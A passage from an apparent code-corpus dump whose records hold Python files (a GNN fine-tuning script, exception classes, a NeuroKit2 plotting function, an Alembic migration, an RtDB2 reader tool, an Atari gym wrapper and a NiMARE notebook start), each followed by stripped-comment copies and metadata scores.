optimizer = optim.Adam(model_param_group, lr=args.lr, weight_decay=args.decay)
print(optimizer)
for epoch in range(1, args.epochs+1):
print("====epoch " + str(epoch))
train(args, model, device, train_loader, optimizer)
print("====Evaluation")
if args.eval_train:
train_acc = eval(args, model, device, train_loader)
else:
print("omit the training accuracy computation")
train_acc = 0
val_acc = eval(args, model, device, val_loader)
test_acc = eval(args, model, device, test_loader)
print("train: %f val: %f test: %f" %(train_acc, val_acc, test_acc))
if __name__ == "__main__":
main()
| import argparse
from loader import MoleculeDataset
from torch_geometric.data import DataLoader
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
import numpy as np
from model import GNN, GNN_graphpred
from sklearn.metrics import roc_auc_score
from splitters import scaffold_split, random_split
import pandas as pd
import os
import shutil
from tensorboardX import SummaryWriter
criterion = nn.BCEWithLogitsLoss(reduction = "none")
def train(args, model, device, loader, optimizer):
model.train()
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y = batch.y.view(pred.shape).to(torch.float64)
#Whether y is non-null or not.
is_valid = y**2 > 0
#Loss matrix
loss_mat = criterion(pred.double(), (y+1)/2)
#loss matrix after removing null target
loss_mat = torch.where(is_valid, loss_mat, torch.zeros(loss_mat.shape).to(loss_mat.device).to(loss_mat.dtype))
optimizer.zero_grad()
loss = torch.sum(loss_mat)/torch.sum(is_valid)
loss.backward()
optimizer.step()
def eval(args, model, device, loader):
model.eval()
y_true = []
y_scores = []
for step, batch in enumerate(tqdm(loader, desc="Iteration")):
batch = batch.to(device)
with torch.no_grad():
pred = model(batch.x, batch.edge_index, batch.edge_attr, batch.batch)
y_true.append(batch.y.view(pred.shape))
y_scores.append(pred)
y_true = torch.cat(y_true, dim = 0).cpu().numpy()
y_scores = torch.cat(y_scores, dim = 0).cpu().numpy()
roc_list = []
for i in range(y_true.shape[1]):
#AUC is only defined when there is at least one positive data.
if np.sum(y_true[:,i] == 1) > 0 and np.sum(y_true[:,i] == -1) > 0:
is_valid = y_true[:,i]**2 > 0
roc_list.append(roc_auc_score((y_true[is_valid,i] + 1)/2, y_scores[is_valid,i]))
if len(roc_list) < y_true.shape[1]:
print("Some target is missing!")
print("Missing ratio: %f" %(1 - float(len(roc_list))/y_true.shape[1]))
return sum(roc_list)/len(roc_list) #y_true.shape[1]
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch implementation of pre-training of graph neural networks')
parser.add_argument('--device', type=int, default=0,
help='which gpu to use if any (default: 0)')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=100,
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate (default: 0.001)')
parser.add_argument('--lr_scale', type=float, default=1,
help='relative learning rate for the feature extraction layer (default: 1)')
parser.add_argument('--decay', type=float, default=0,
help='weight decay (default: 0)')
parser.add_argument('--num_layer', type=int, default=5,
help='number of GNN message passing layers (default: 5).')
parser.add_argument('--emb_dim', type=int, default=300,
help='embedding dimensions (default: 300)')
parser.add_argument('--dropout_ratio', type=float, default=0.5,
help='dropout ratio (default: 0.5)')
parser.add_argument('--graph_pooling', type=str, default="mean",
help='graph level pooling (sum, mean, max, set2set, attention)')
parser.add_argument('--JK', type=str, default="last",
help='how the node features across layers are combined. last, sum, max or concat')
parser.add_argument('--gnn_type', type=str, default="gin")
parser.add_argument('--dataset', type=str, default = 'sider', help='root directory of dataset. For now, only classification.')
parser.add_argument('--input_model_file', type=str, default = '../motif_based_pretrain/saved_model/motif_pretrain.pth', help='filename to read the model (if there is any)')
parser.add_argument('--filename', type=str, default = '', help='output filename')
parser.add_argument('--seed', type=int, default=42, help = "Seed for splitting the dataset.")
parser.add_argument('--runseed', type=int, default=0, help = "Seed for minibatch selection, random initialization.")
parser.add_argument('--split', type = str, default="scaffold", help = "random or scaffold or random_scaffold")
parser.add_argument('--eval_train', type=int, default = 1, help='evaluating training or not')
parser.add_argument('--num_workers', type=int, default = 4, help='number of workers for dataset loading')
args = parser.parse_args()
torch.manual_seed(args.runseed)
np.random.seed(args.runseed)
device = torch.device("cuda:" + str(args.device)) if torch.cuda.is_available() else torch.device("cpu")
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.runseed)
#Bunch of classification tasks
if args.dataset == "tox21":
num_tasks = 12
elif args.dataset == "hiv":
num_tasks = 1
elif args.dataset == "pcba":
num_tasks = 128
elif args.dataset == "muv":
num_tasks = 17
elif args.dataset == "bace":
num_tasks = 1
elif args.dataset == "bbbp":
num_tasks = 1
elif args.dataset == "toxcast":
num_tasks = 617
elif args.dataset == "sider":
num_tasks = 27
elif args.dataset == "clintox":
num_tasks = 2
else:
raise ValueError("Invalid dataset name.")
#set up dataset
dataset = MoleculeDataset("dataset/" + args.dataset, dataset=args.dataset)
print(dataset)
if args.split == "scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1)
print("scaffold")
elif args.split == "random":
train_dataset, valid_dataset, test_dataset = random_split(dataset, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random")
elif args.split == "random_scaffold":
smiles_list = pd.read_csv('dataset/' + args.dataset + '/processed/smiles.csv', header=None)[0].tolist()
train_dataset, valid_dataset, test_dataset = random_scaffold_split(dataset, smiles_list, null_value=0, frac_train=0.8,frac_valid=0.1, frac_test=0.1, seed = args.seed)
print("random scaffold")
else:
raise ValueError("Invalid split option.")
print(train_dataset[0])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers = args.num_workers)
val_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=False, num_workers = args.num_workers)
#set up model
model = GNN_graphpred(args.num_layer, args.emb_dim, num_tasks, JK = args.JK, drop_ratio = args.dropout_ratio, graph_pooling = args.graph_pooling, gnn_type = args.gnn_type)
if not args.input_model_file == "":
model.from_pretrained(args.input_model_file)
model.to(device)
#set up optimizer
#different learning rate for different part of GNN
model_param_group = []
model_param_group.append({"params": model.gnn.parameters()})
if args.graph_pooling == "attention":
model_param_group.append({"params": model.pool.parameters(), "lr":args.lr*args.lr_scale})
model_param_group.append({"params": model.graph_pred_linear.parameters(), "lr":args.lr*args.lr_scale})
optimizer = optim.Adam(model_param_group, lr=args.lr, weight_decay=args.decay)
print(optimizer)
for epoch in range(1, args.epochs+1):
print("====epoch " + str(epoch))
train(args, model, device, train_loader, optimizer)
print("====Evaluation")
if args.eval_train:
train_acc = eval(args, model, device, train_loader)
else:
print("omit the training accuracy computation")
train_acc = 0
val_acc = eval(args, model, device, val_loader)
test_acc = eval(args, model, device, test_loader)
print("train: %f val: %f test: %f" %(train_acc, val_acc, test_acc))
if __name__ == "__main__":
main() | en | 0.825241 | #Whether y is non-null or not. #Loss matrix #loss matrix after removing null target #AUC is only defined when there is at least one positive data. #y_true.shape[1] # Training settings #Bunch of classification tasks #set up dataset #set up model #set up optimizer #different learning rate for different part of GNN | 2.097953 | 2 |
jumpscale/packages/vdc_dashboard/bottle/api/exceptions.py | threefoldtech/js-sdk | 13 | 8044 | <reponame>threefoldtech/js-sdk
from jumpscale.core import exceptions
class BaseError(exceptions.Base):
"""a generic base error for bcdb rest, with status code"""
def __init__(self, status, *args, **kwargs):
super().__init__(*args, *kwargs)
self.status = status
class VDCNotFound(BaseError):
pass
class MissingAuthorizationHeader(BaseError):
pass
class InvalidCredentials(BaseError):
pass
class MissingArgument(BaseError):
pass
class StellarServiceDown(BaseError):
pass
class FlavorNotSupported(BaseError):
pass
class NoEnoughCapacity(BaseError):
pass
class AdddingNodeFailed(BaseError):
pass
class VirtualMachineDeploymentFailed(BaseError):
pass
class CannotDeleteMasterNode(BaseError):
pass
class ZDBDeploymentFailed(BaseError):
pass
class ZDBDeletionFailed(BaseError):
pass
class KubeConfigNotFound(BaseError):
pass
class InvalidKubeConfig(BaseError):
pass
class ZStorConfigNotFound(BaseError):
pass
class InvalidZStorConfig(BaseError):
pass
class NoEnoughFunds(BaseError):
pass
class BadRequestError(BaseError):
pass
class UnknownError(BaseError):
pass
| from jumpscale.core import exceptions
class BaseError(exceptions.Base):
"""a generic base error for bcdb rest, with status code"""
def __init__(self, status, *args, **kwargs):
super().__init__(*args, *kwargs)
self.status = status
class VDCNotFound(BaseError):
pass
class MissingAuthorizationHeader(BaseError):
pass
class InvalidCredentials(BaseError):
pass
class MissingArgument(BaseError):
pass
class StellarServiceDown(BaseError):
pass
class FlavorNotSupported(BaseError):
pass
class NoEnoughCapacity(BaseError):
pass
class AdddingNodeFailed(BaseError):
pass
class VirtualMachineDeploymentFailed(BaseError):
pass
class CannotDeleteMasterNode(BaseError):
pass
class ZDBDeploymentFailed(BaseError):
pass
class ZDBDeletionFailed(BaseError):
pass
class KubeConfigNotFound(BaseError):
pass
class InvalidKubeConfig(BaseError):
pass
class ZStorConfigNotFound(BaseError):
pass
class InvalidZStorConfig(BaseError):
pass
class NoEnoughFunds(BaseError):
pass
class BadRequestError(BaseError):
pass
class UnknownError(BaseError):
pass | en | 0.552627 | a generic base error for bcdb rest, with status code | 2.26575 | 2 |
neurokit2/signal/signal_plot.py | gutierrezps/NeuroKit | 1 | 8045 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
| # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from ..events import events_plot
from ..stats import standardize as nk_standardize
def signal_plot(
signal, sampling_rate=None, subplots=False, standardize=False, labels=None, **kwargs
):
"""Plot signal with events as vertical lines.
Parameters
----------
signal : array or DataFrame
Signal array (can be a dataframe with many signals).
sampling_rate : int
The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if
the data should be plotted over time in seconds. Otherwise the data is plotted over samples.
Defaults to None.
subplots : bool
If True, each signal is plotted in a subplot.
standardize : bool
If True, all signals will have the same scale (useful for visualisation).
labels : str or list
Defaults to None.
**kwargs : optional
Arguments passed to matplotlib plotting.
Examples
----------
>>> import numpy as np
>>> import pandas as pd
>>> import neurokit2 as nk
>>>
>>> signal = nk.signal_simulate(duration=10, sampling_rate=1000)
>>> nk.signal_plot(signal, sampling_rate=1000, color="red")
>>>
>>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)),
... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)),
... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))})
>>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True)
>>> nk.signal_plot([signal, data], standardize=True)
"""
# Sanitize format
if isinstance(signal, list):
try:
for i in signal:
len(i)
except TypeError:
signal = np.array(signal)
if isinstance(signal, pd.DataFrame) is False:
# If list is passed
if isinstance(signal, list) or len(np.array(signal).shape) > 1:
out = pd.DataFrame()
for i, content in enumerate(signal):
if isinstance(content, (pd.DataFrame, pd.Series)):
out = pd.concat([out, content], axis=1, sort=True)
else:
out = pd.concat(
[out, pd.DataFrame({"Signal" + str(i + 1): content})],
axis=1,
sort=True,
)
signal = out
# If vector is passed
else:
signal = pd.DataFrame({"Signal": signal})
# Copy signal
signal = signal.copy()
# Guess continuous and events columns
continuous_columns = list(signal.columns.values)
events_columns = []
for col in signal.columns:
vector = signal[col]
if vector.nunique() == 2:
indices = np.where(vector == np.max(vector.unique()))
if bool(np.any(np.diff(indices) == 1)) is False:
events_columns.append(col)
continuous_columns.remove(col)
# Adjust for sampling rate
if sampling_rate is not None:
signal.index = signal.index / sampling_rate
title_x = "Time (seconds)"
else:
title_x = "Time"
# x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0])
# x_axis = pd.DataFrame(x_axis, columns=["Time (s)"])
# signal = pd.concat([signal, x_axis], axis=1)
# signal = signal.set_index("Time (s)")
# Plot accordingly
if len(events_columns) > 0:
events = []
for col in events_columns:
vector = signal[col]
events.append(np.where(vector == np.max(vector.unique()))[0])
plot = events_plot(events, signal=signal[continuous_columns])
if sampling_rate is None and signal.index.is_integer():
plot.gca().set_xlabel("Samples")
else:
plot.gca().set_xlabel(title_x)
else:
# Aesthetics
colors = [
"#1f77b4",
"#ff7f0e",
"#2ca02c",
"#d62728",
"#9467bd",
"#8c564b",
"#e377c2",
"#7f7f7f",
"#bcbd22",
"#17becf",
]
if len(continuous_columns) > len(colors):
colors = plt.cm.viridis(np.linspace(0, 1, len(continuous_columns)))
# Plot
if standardize is True:
signal[continuous_columns] = nk_standardize(signal[continuous_columns])
if subplots is True:
_, axes = plt.subplots(nrows=len(continuous_columns), ncols=1, sharex=True, **kwargs)
for ax, col, color in zip(axes, continuous_columns, colors):
ax.plot(signal[col], c=color, **kwargs)
else:
plot = signal[continuous_columns].plot(subplots=False, sharex=True, **kwargs)
if sampling_rate is None and signal.index.is_integer():
plt.xlabel("Samples")
else:
plt.xlabel(title_x)
# Tidy legend locations and add labels
if labels is None:
labels = continuous_columns.copy()
if isinstance(labels, str):
n_labels = len([labels])
labels = [labels]
elif isinstance(labels, list):
n_labels = len(labels)
if len(signal[continuous_columns].columns) != n_labels:
raise ValueError(
"NeuroKit error: signal_plot(): number of labels does not equal the number of plotted signals."
)
if subplots is False:
plt.legend(labels, loc=1)
else:
for i, label in enumerate(labels):
axes[i].legend([label], loc=1)
| en | 0.603918 | # -*- coding: utf-8 -*- Plot signal with events as vertical lines. Parameters ---------- signal : array or DataFrame Signal array (can be a dataframe with many signals). sampling_rate : int The sampling frequency of the signal (in Hz, i.e., samples/second). Needs to be supplied if the data should be plotted over time in seconds. Otherwise the data is plotted over samples. Defaults to None. subplots : bool If True, each signal is plotted in a subplot. standardize : bool If True, all signals will have the same scale (useful for visualisation). labels : str or list Defaults to None. **kwargs : optional Arguments passed to matplotlib plotting. Examples ---------- >>> import numpy as np >>> import pandas as pd >>> import neurokit2 as nk >>> >>> signal = nk.signal_simulate(duration=10, sampling_rate=1000) >>> nk.signal_plot(signal, sampling_rate=1000, color="red") >>> >>> data = pd.DataFrame({"Signal2": np.cos(np.linspace(start=0, stop=20, num=1000)), ... "Signal3": np.sin(np.linspace(start=0, stop=20, num=1000)), ... "Signal4": nk.signal_binarize(np.cos(np.linspace(start=0, stop=40, num=1000)))}) >>> nk.signal_plot(data, labels=['signal_1', 'signal_2', 'signal_3'], subplots=True) >>> nk.signal_plot([signal, data], standardize=True) # Sanitize format # If list is passed # If vector is passed # Copy signal # Guess continuous and events columns # Adjust for sampling rate # x_axis = np.linspace(0, signal.shape[0] / sampling_rate, signal.shape[0]) # x_axis = pd.DataFrame(x_axis, columns=["Time (s)"]) # signal = pd.concat([signal, x_axis], axis=1) # signal = signal.set_index("Time (s)") # Plot accordingly # Aesthetics # Plot # Tidy legend locations and add labels | 3.479799 | 3 |
migrations/versions/1a89721126f7_only_one_validation_per_mission_user_.py | MTES-MCT/mobilic-api | 0 | 8046 | """Only one validation per mission, user and actor
Revision ID: <KEY>
Revises: <KEY>
Create Date: 2021-10-14 11:22:01.124488
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
op.execute(
"""
WITH validation_duplicates AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn
FROM mission_validation
)
DELETE FROM mission_validation mv
USING validation_duplicates vd
WHERE mv.id = vd.id AND vd.rn >= 2
"""
)
op.execute(
"""
ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user
EXCLUDE USING GIST (
mission_id WITH =,
submitter_id WITH =,
user_id WITH =
)
"""
)
def downgrade():
op.drop_constraint(
"only_one_validation_per_submitter_mission_and_user",
"mission_validation",
)
| """Only one validation per mission, user and actor
Revision ID: <KEY>
Revises: <KEY>
Create Date: 2021-10-14 11:22:01.124488
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
op.execute(
"""
WITH validation_duplicates AS (
SELECT
id,
ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn
FROM mission_validation
)
DELETE FROM mission_validation mv
USING validation_duplicates vd
WHERE mv.id = vd.id AND vd.rn >= 2
"""
)
op.execute(
"""
ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user
EXCLUDE USING GIST (
mission_id WITH =,
submitter_id WITH =,
user_id WITH =
)
"""
)
def downgrade():
op.drop_constraint(
"only_one_validation_per_submitter_mission_and_user",
"mission_validation",
)
| en | 0.550867 | Only one validation per mission, user and actor Revision ID: <KEY> Revises: <KEY> Create Date: 2021-10-14 11:22:01.124488 # revision identifiers, used by Alembic. WITH validation_duplicates AS ( SELECT id, ROW_NUMBER() OVER (PARTITION BY user_id, mission_id, submitter_id ORDER BY reception_time DESC) AS rn FROM mission_validation ) DELETE FROM mission_validation mv USING validation_duplicates vd WHERE mv.id = vd.id AND vd.rn >= 2 ALTER TABLE mission_validation ADD CONSTRAINT only_one_validation_per_submitter_mission_and_user EXCLUDE USING GIST ( mission_id WITH =, submitter_id WITH =, user_id WITH = ) | 1.486342 | 1 |
packages/facilities/rtdb/python/rtdb2_get.py | Falcons-Robocup/code | 2 | 8047 | # Copyright 2020 <NAME> (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/python
import os
import sys
import argparse
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
import rtdb2tools
from hexdump import hexdump
# Main structure of the program
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'This tool reads a value from the database given an RtDB key.\n'
exampleTxt = """Example: rtdb2_get.py -a 6 ROBOT_STATE
age: 2h
shared: True
list: False
value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A']
Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']"
[[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]]
"""
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-a', '--agent', help='agent ID to use', type=int, default=rtdb2tools.guessAgentId())
parser.add_argument('-s', '--serialized', help='also show serialized string (as hexdump)', action='store_true')
parser.add_argument('-p', '--path', help='database path to use', type=str, default=RTDB2_DEFAULT_PATH)
parser.add_argument('-x', '--expression', help='evaluate expression, useful to fetch a specific element', type=str)
parser.add_argument('key', help='RtDB key to read')
args = parser.parse_args()
# Create instance of RtDB2Store and read databases from disk
rtdb2Store = RtDB2Store(args.path)
item = rtdb2Store.get(args.agent, args.key, timeout=None)
if args.expression:
print(eval("item.value" + args.expression))
else:
print(str(item))
if args.serialized:
hexdump(item.value_serialized)
rtdb2Store.closeAll()
| # Copyright 2020 <NAME> (Falcons)
# SPDX-License-Identifier: Apache-2.0
#!/usr/bin/python
import os
import sys
import argparse
from rtdb2 import RtDB2Store, RTDB2_DEFAULT_PATH
import rtdb2tools
from hexdump import hexdump
# Main structure of the program
if __name__ == "__main__":
# Argument parsing.
descriptionTxt = 'This tool reads a value from the database given an RtDB key.\n'
exampleTxt = """Example: rtdb2_get.py -a 6 ROBOT_STATE
age: 2h
shared: True
list: False
value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A']
Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']"
[[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]]
"""
parser = argparse.ArgumentParser(description=descriptionTxt, epilog=exampleTxt, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-a', '--agent', help='agent ID to use', type=int, default=rtdb2tools.guessAgentId())
parser.add_argument('-s', '--serialized', help='also show serialized string (as hexdump)', action='store_true')
parser.add_argument('-p', '--path', help='database path to use', type=str, default=RTDB2_DEFAULT_PATH)
parser.add_argument('-x', '--expression', help='evaluate expression, useful to fetch a specific element', type=str)
parser.add_argument('key', help='RtDB key to read')
args = parser.parse_args()
# Create instance of RtDB2Store and read databases from disk
rtdb2Store = RtDB2Store(args.path)
item = rtdb2Store.get(args.agent, args.key, timeout=None)
if args.expression:
print(eval("item.value" + args.expression))
else:
print(str(item))
if args.serialized:
hexdump(item.value_serialized)
rtdb2Store.closeAll()
| en | 0.436715 | # Copyright 2020 <NAME> (Falcons) # SPDX-License-Identifier: Apache-2.0 #!/usr/bin/python # Main structure of the program # Argument parsing. Example: rtdb2_get.py -a 6 ROBOT_STATE age: 2h shared: True list: False value: [2, [1581172987, 618438], [0.05368572473526001, -0.2938263416290283, 5.330356597900391], [0.1385340541601181, -0.8020891547203064, 0.7817431688308716], False, [0.0, 0.0], 6, 'A'] Example: rtdb2_get.py -a 2 DIAG_WORLDMODEL_LOCAL -x "['balls'][0]['result']" [[5.3209381103515625, 0.5837346315383911, 0.15281200408935547], [-0.0029433025047183037, 0.01433953270316124, 1.2758345292240847e-05], 1.0, [22033, 1889585904]] # Create instance of RtDB2Store and read databases from disk | 2.525046 | 3 |
algorithms/A3C/atari/atari_env_deprecated.py | what3versin/reinforce_py | 1 | 8048 | from __future__ import print_function
from __future__ import division
import os
import gym
import numpy as np
from skimage.transform import resize
from skimage.color import rgb2gray
class Atari(object):
s_dim = [84, 84, 1]
a_dim = 3
def __init__(self, args, record_video=False):
self.env = gym.make('BreakoutNoFrameskip-v4')
self.ale = self.env.env.ale # ale interface
if record_video:
video_dir = os.path.join(args.save_path, 'videos')
if not os.path.exists(video_dir):
os.makedirs(video_dir)
self.env = gym.wrappers.Monitor(
self.env, video_dir, video_callable=lambda x: True, resume=True)
self.ale = self.env.env.env.ale
self.screen_size = Atari.s_dim[:2] # 84x84
self.noop_max = 30
self.frame_skip = 4
self.frame_feq = 4
self.s_dim = Atari.s_dim
self.a_dim = Atari.a_dim
self.action_space = [1, 2, 3] # Breakout specify
self.done = True
def new_round(self):
if not self.done: # dead but not done
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
obs = self.preprocess(obs)
else: # terminal
self.env.reset()
# No-op
for _ in range(np.random.randint(1, self.noop_max + 1)):
obs, _, done, _ = self.env.step(0)
obs = self.preprocess(obs)
return obs
def preprocess(self, observ):
return resize(rgb2gray(observ), self.screen_size)
def step(self, action):
observ, reward, dead = None, 0, False
for _ in range(self.frame_skip):
lives_before = self.ale.lives()
o, r, self.done, _ = self.env.step(self.action_space[action])
lives_after = self.ale.lives()
reward += r
if lives_before > lives_after:
dead = True
break
observ = self.preprocess(o)
observ = np.reshape(observ, newshape=self.screen_size + [1])
self.state = np.append(self.state[:, :, 1:], observ, axis=2)
return self.state, reward, dead, self.done
| from __future__ import print_function
from __future__ import division
import os
import gym
import numpy as np
from skimage.transform import resize
from skimage.color import rgb2gray
class Atari(object):
s_dim = [84, 84, 1]
a_dim = 3
def __init__(self, args, record_video=False):
self.env = gym.make('BreakoutNoFrameskip-v4')
self.ale = self.env.env.ale # ale interface
if record_video:
video_dir = os.path.join(args.save_path, 'videos')
if not os.path.exists(video_dir):
os.makedirs(video_dir)
self.env = gym.wrappers.Monitor(
self.env, video_dir, video_callable=lambda x: True, resume=True)
self.ale = self.env.env.env.ale
self.screen_size = Atari.s_dim[:2] # 84x84
self.noop_max = 30
self.frame_skip = 4
self.frame_feq = 4
self.s_dim = Atari.s_dim
self.a_dim = Atari.a_dim
self.action_space = [1, 2, 3] # Breakout specify
self.done = True
def new_round(self):
if not self.done: # dead but not done
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
obs = self.preprocess(obs)
else: # terminal
self.env.reset()
# No-op
for _ in range(np.random.randint(1, self.noop_max + 1)):
obs, _, done, _ = self.env.step(0)
obs = self.preprocess(obs)
return obs
def preprocess(self, observ):
return resize(rgb2gray(observ), self.screen_size)
def step(self, action):
observ, reward, dead = None, 0, False
for _ in range(self.frame_skip):
lives_before = self.ale.lives()
o, r, self.done, _ = self.env.step(self.action_space[action])
lives_after = self.ale.lives()
reward += r
if lives_before > lives_after:
dead = True
break
observ = self.preprocess(o)
observ = np.reshape(observ, newshape=self.screen_size + [1])
self.state = np.append(self.state[:, :, 1:], observ, axis=2)
return self.state, reward, dead, self.done
| en | 0.407234 | # ale interface # 84x84 # Breakout specify # dead but not done # no-op step to advance from terminal/lost life state # terminal # No-op | 2.579429 | 3 |
content/_build/jupyter_execute/macm.py | NBCLab/nimare-paper | 3 | 8049 | <reponame>NBCLab/nimare-paper
#!/usr/bin/env python
# coding: utf-8
# # Meta-Analytic Coactivation Modeling
# In[1]:
# First, import the necessary modules and functions
import os
from datetime import datetime
import matplotlib.pyplot as plt
from myst_nb import glue
from repo2data.repo2data import Repo2Data
import nimare
start = datetime.now()
# Install the data if running locally, or points to cached data if running on neurolibre
DATA_REQ_FILE = os.path.join("../binder/data_requirement.json")
FIG_DIR = os.path.abspath("../images")
# Download data
repo2data = Repo2Data(DATA_REQ_FILE)
